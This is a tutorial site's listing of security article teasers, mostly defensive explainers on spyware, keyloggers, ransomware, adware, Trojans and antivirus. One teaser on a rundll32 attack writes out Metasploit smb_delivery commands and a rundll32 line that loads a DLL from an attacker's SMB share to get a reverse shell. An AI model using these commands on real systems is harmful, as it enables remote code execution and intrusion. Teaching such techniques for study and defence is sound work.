- Trending Categories
Data Structure
Networking
RDBMS
Operating System
Java
MS Excel
iOS
HTML
CSS
Android
Python
C Programming
C++
C#
MongoDB
MySQL
Javascript
PHP
Physics
Chemistry
Biology
Mathematics
English
Economics
Psychology
Social Studies
Fashion Studies
Legal Studies
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Found 1009 Articles for Safe & Security
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
1K+ Views
Some malicious programs are not as devastating as Trojans or Virus but still possess danger to the system. Such programs are coined under the term Grayware.In this post, we will know more about Grayware, how it enters your device, and how to prevent it from infiltrating your system.What is Grayware?As its name suggests, Grayware is a software type that comes between malicious(black) and non-malicious(white) software categories. Grayware programs can be used for both legal and illegal activities. For example, Spyware and Keyloggers can be categorized under Grayware. They can be legally used by organizations to track the activities of their ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
2K+ Views
If you suspect everything you type from your keyboard is getting recorded and logged, then there might be a Keylogger present on your device. In this post, we would discuss what Keylogger is and how to prevent it from entering your system.What is Keylogger?Keylogger is a malicious program that is specifically designed to monitor and log the keystrokes made by the user on their keyboards. It is a form of spyware program used by cybercriminals to fetch sensitive information like banking details, login credentials of social media accounts, credit card number, etc. A keylogger can monitor and log such information ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
308 Views
Suppose you notice your system is consuming a lot more internet data than usual, and your device is regularly heating up even though you are not using it. In that case, it is possible that a Spyware program is hidden on your system, which is causing such irregularities.In this post, we would discuss more on Spyware and how to get rid of it.What is Spyware?Spyware is a broad category of malware program that infiltrates the user's system without permission to perform various malicious tasks. As its name suggests, Spyware is basically meant for spying on the users and collect their ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
590 Views
If you find that documents, pictures, and other files on your system are automatically renamed by appending an unknown suffix, then it might be because of a Ransomware attack. In this guide, we would discuss in detail what Ransomware is, how it works, and how to prevent Ransomware attacks on your system.What is Ransomware?Ransomware is one of the deadliest malware programs that, after infiltrating the system, lock the files with strong encryption. After encrypting the files, the cybercriminal(s) behind the attack would ask the victim for the ransom in return for an encrypting tool or key.Without the decrypting key or ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
284 Views
If you are suddenly receiving random ads on your browser and system, it might be because of an Adware infection. This post will guide you on what is Adware, how do you get it, what are its symptoms, and how to protect your device from Adware.What is Adware?Adware is short for advertising-supported software. It is the extension or application responsible for ad displaying on your browser, applications, or system. Generally, Adware enters the system unintentionally, and therefore it comes under Potentially Unwanted Programs or PUP. Since it can conduct various malicious tasks after infiltrating your device, it is also one ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
989 Views
In this chapter, we would learn about Trojan in detail. What it is, how it got its name, what are the common types of Trojan, how it works, and how to get rid of it if you encountered one.What is Trojan?The Trojan is a type of malware program or code that presents itself as a useful legitimate program so that users would get fascinated by it and install it. It usually tricks users by using social engineering techniques. Cyberattackers design Trojan to control the system to perform various vicious tasks such as stealing private information & secret files, damage the ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
2K+ Views
Malware is a term used to describe a computer program responsible for causing a disturbance in your system's working and carrying out other illicit activities. In this chapter, we would learn what the different types of malware are and how they get infiltrated into the system.Types of MalwareBased on the infiltrating nature, attack type, and damage levels, malware are broadly classified into 12 types.1. VirusesThe virus is the oldest Malware type and one of the most common. It is a computer program that, after infiltrating the system, replicate itself by modifying the codes of other programs. It also has the ... Read More
![PranavBhardwaj](https://www.tutorialspoint.com/assets/profiles/319004/profile/60_218509-1616062415.jpg)
1K+ Views
If your computer or smartphone has suddenly started misbehaving, then it might be because of a Malware program. In this chapter, we would know what Malware is and what are its common types.What is Malware?The term Malware is a combination of two words Malicious and Software. It is a common term that is used to denote a software or script that is implicitly designed to create damage to any computer, smartphone, IoT devices, Network, and other programable devices. The damage can be anything like hijacking the browser, locking the essential files, degrading the device's performance, and many such.The term Malware was ... Read More
![Ajay yadav](https://www.tutorialspoint.com/assets/profiles/152707/profile/60_183870-1577075932.jpg)
519 Views
Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0Read More
![Kiran Kumar Panigrahi](https://www.tutorialspoint.com/assets/profiles/390736/profile/60_2598-1635242143.png)
2K+ Views
Both Internet Security and Antivirus are the techniques that are being used to protect the user from malicious programs by blocking and removing them specifically when the user interacts with external resources.An Antivirus could be defined as an application or software which provides security from the malicious software specifically coming from the Internet. In contrast, Internet Security is a term that is used for a wide range of issues; we can think of it as a collection of Apps designed to protect users from online threats.In this article, we will take a look at the different features of an Antivirus ... Read More